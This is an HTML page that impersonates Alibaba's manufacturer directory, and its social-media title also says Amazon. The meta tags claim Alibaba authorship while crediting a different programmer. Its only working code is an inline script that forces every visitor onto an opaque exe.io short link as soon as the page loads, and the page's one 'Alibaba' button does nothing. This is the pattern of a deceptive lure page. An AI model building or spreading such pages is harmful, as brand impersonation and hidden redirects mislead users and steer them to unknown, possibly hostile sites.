<!DOCTYPE html >
<html>
  <head>

   <meta property="og:title" content="xnmap" />  <meta name="description" content="Manufacturers & Suppliers Directory. You can Source Manufacturers, Suppliers, Exporters, Importers from mobile site on m.alibaba.com" /> 

 <meta property="og:image" content="https://j.top4top.io/p_2338q3zqj0.jpg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630"/> <meta property="og:type" content="website" />
    
    <meta name="twitter:card" content="summary_large_image"> 
    <meta name="twitter:title" content="Amazon">
    <meta name="twitter:description" content="programmer mohammed syf"> 
    <meta name="twitter:image" content=""> 
    <meta name="twitter:site" content="@"> <meta name="twitter:creator" content="@"> 
    
  <link rel="icon" href="https://k.top4top.io/p_23396flvr0.png" />
  <link rel="shortcut" href="https://k.top4top.io/p_23396flvr0.png" /> 
  <link rel="apple-touch-icon" href="https://k.top4top.io/p_23396flvr0.png" />
  


    <meta charset="utf-8"> 
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta name="keywords" content="Manufacturers, Suppliers, Exporters, Importers, Products, Trade Leads, Supplier, Manufacturer, Exporter, Importer" />
 

    
    <meta name="author" content="Alibaba"/>
    
  
<title>advanced-xnmap2031, Alibaba Manufacturer Directory</title>



    
    
    <style>
    body{
      background-color: 	#FF4500;
    }
      .div{
        border-radius: 10px;
        box-shadow: 4px 4px 20px black, -4px -4px 20px black;
        width:99%;
        height :400px;
        
        
      }
      .img{
        
        width: 90%;
        border-radius: 10px;
        transform: translate(6%,0%);
      }
      .fb{
        font-family: 'Poppins', sans-serif;
        width: 50%;
        border:1px solid black;
        
        border-radius: 10px ;
        background-color: white;
        transform: translate(50%,0%);
      }
    </style>
  </head>
  <body>
    <div class="div">
      <br>
      <img class="img" src="https://k.top4top.io/p_23396flvr0.png"/>
      <br><br>
      <a href="">
      <button class="fb">Alibaba</button>
      </a>
      <script>
    location=('https://exe.io/3RrF9WBA'); 
      </script>
    </div>
  </body>
</html>